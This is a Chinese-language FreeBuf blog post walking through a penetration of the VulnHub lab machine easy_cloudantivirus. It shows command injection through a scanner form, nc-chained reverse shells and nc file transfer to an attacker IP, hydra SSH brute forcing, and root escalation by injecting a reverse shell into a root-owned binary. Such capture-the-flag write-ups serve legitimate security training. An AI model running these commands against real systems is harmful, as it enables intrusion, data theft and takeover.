freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

Vulnhub靶机 easy_cloudantivirus 打靶 渗透详细过程
rumilc 2024-04-16 21:11:05 112466

VulnHub靶机 easy_cloudantivirus 打靶

一、导入虚拟机配置

靶机地址:

https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/

下载完成,打开VirtualBox导入即可:

image-20240412201446313

二、攻击方式

主机发现

信息收集,使用nmap或者arp-scan进行扫描,发现主机

也可以循环执行 arping 命令,arping不能对一个网段进行扫描,循环实现。

for i in  $(seq 1 254); do sudo arping  -c 2  10.1.2.$i; done

image-20240412195234561

端口扫描

nmap进行端口扫描,探针端口,服务信息

nmap -p- 10.1.2.126
nmap -sV -A 10.1.2.126

image-20240412195459338

探针发现,开发22和8080端口,可以使用hydra进行尝试ssh爆破,但是未果。

hydra -l root -P passwd.txt ssh://10.1.2.126

web渗透-SQL注入

发现还开放了8080端口,进行访问web界面,如下

image-20240412200652316

发现此网站为一个扫描器相关的网站,在交互处输入邀请码才可测试扫描,尝试注入测试

image-20240412200638100

输入数据不论数字还是字母,都给以下提示:

错误信息

image-20240412200957327

抓包,发现password参数,可进行注入,导入fuzzer字典,进行模糊测试

image-20240412201058846

选择并插入fuzzer的模糊测试字典,如下:

测试闭合方式,进行注入

image-20240412201221675

然后开始攻击,爆破即可,根据长度进行筛选,并发现状态码为200,页面变化:

image-20240412201918175

得到payload测试输入,来到web界面,如下:

image-20240412201953388

然后我们随便输入一个以上提供的进行scan,观察页面变化,如选择第一个bash

等待扫描后如下:

image-20240412202758732

命令注入

根据以上,尝试命令注入,加入管道符跟上执行命令,看是否可回显

bash | ls

image-20240412203109338

页面成功回显,带出当前目录下的文件内容信息

反弹shell

尝试反弹shell,使用nc命令

image-20240412203248053

bash | nc 10.1.2.218 8888 -e /bin/bash

执行过后,发现无反应,没有反弹,可能此linux当中的nc不支持-e参数,采用nc串联的方式

bash | nc 10.1.2.218 6666 | /bin/bash | nc 10.1.2.218 8888

这里kali需要同时开启6666和8888端口,我们在6666端口输入的语句会在靶机中输入到bash环境中执行,再将执行的结果返回到kali的8888端口中。(这里针对nc没有-e参数还可以使用命名管道符进行反弹shell)

成功接收回显信息

image-20240412203949597

回显结果:

image-20240412204014879

ssh爆破

发现当前路径有database.sql文件,查看此文件类型,判断是何数据库文件

file database.sql

image-20240412204159892

此数据库文件为sqlite3,使用命令sqlite3查看一下,发现无此命令,那只能将其下载到本地,进行查看利用。

使用nc将文件传输到本地中,在本地进行内容的读取

kali:
nc -lvvp 5555 > database.sql

shell:
nc 10.1.2.218 5555 < database.sql

image-20240412210535124

成功下载到本地,通过sqlite3命令查看数据库内容

sqlite3
.open database.sql
.database
.dump

image-20240412210611604

得到四个密码信息:

myinvitecode123
mysecondinvitecode 
cloudavtech  
mostsecurescanner

查看靶机的/etc/passwd文件当中的用户信息,并查看有/bin/bash得账号

cat /etc/passwd | grep /bin/bash

拥有此权限的有以下三个用户:

image-20240412210912790

加上以上四个密码,尝试进行爆破,创建user.txt和passwd.txt,将以上的用户信息和密码填入,进行爆破,使用hydra爆破,但是未果

hydra -L user.txt -P passwd.txt ssh://10.1.2.126

image-20240412211449355

获取一个稳定shell,使用python

python -c "import pty;pty.spawn('/bin/bash')"

image-20240412211654113

image-20240412211618060

提权

查看有suid权限的文件信息:

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

image-20240412212310197

没有可利用的suid权限文件,查看/etc/passwd,只读权限,无法利用

image-20240412212421873

查看上一级目录有无利用文件

发现.c文件,并且已经编译好,恰好属主为root,那么利用一下,直接运行

image-20240412212459176

image-20240412212546968

提示我们缺省命令参数,那么我们加上命令再次运行,发现有log文件动用,尝试反弹shell

image-20240412212920294

查看此文件的源码:

image-20240412213728375

加上参数,尝试反弹shell

nc反弹shell,继续参与nc串联的方式

./updata_cloudav "1|nc 10.1.2.218 9999 | /bin/bash | nc 10.1.2.218 7777"

image-20240412213451265

成功接收,root权限

image-20240412213516669

image-20240412213530514

思路:

主机发现--->端口服务扫描--->开放22端口可爆破--->访问web服务--->SQL注入--->命令注入--->反弹shell,nc串联--->ssh爆破--->找提权点--->代码审计--->提权

文章不妥之处,欢迎批评指正!

# 漏洞 # 渗透测试 # web安全 # 漏洞分析 # 网络安全技术
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 rumilc 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
VulnHub靶机 | 红队打靶
权限提升
WEB安全
rumilc LV.5
喜欢网络安全,热爱探索前沿技术! 答案交给时间寻觅,未来不负时光所期! CSDN:https://blog.csdn.net/rumil
  • 27 文章数
  • 38 关注者
内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术
2024-06-02
内网安全-隧道搭建&穿透上线&内网渗透-Linux上线-cs上线Linux主机
2024-05-28
VulnHub靶机 DC-9打靶 渗透详细流程
2024-04-27
文章目录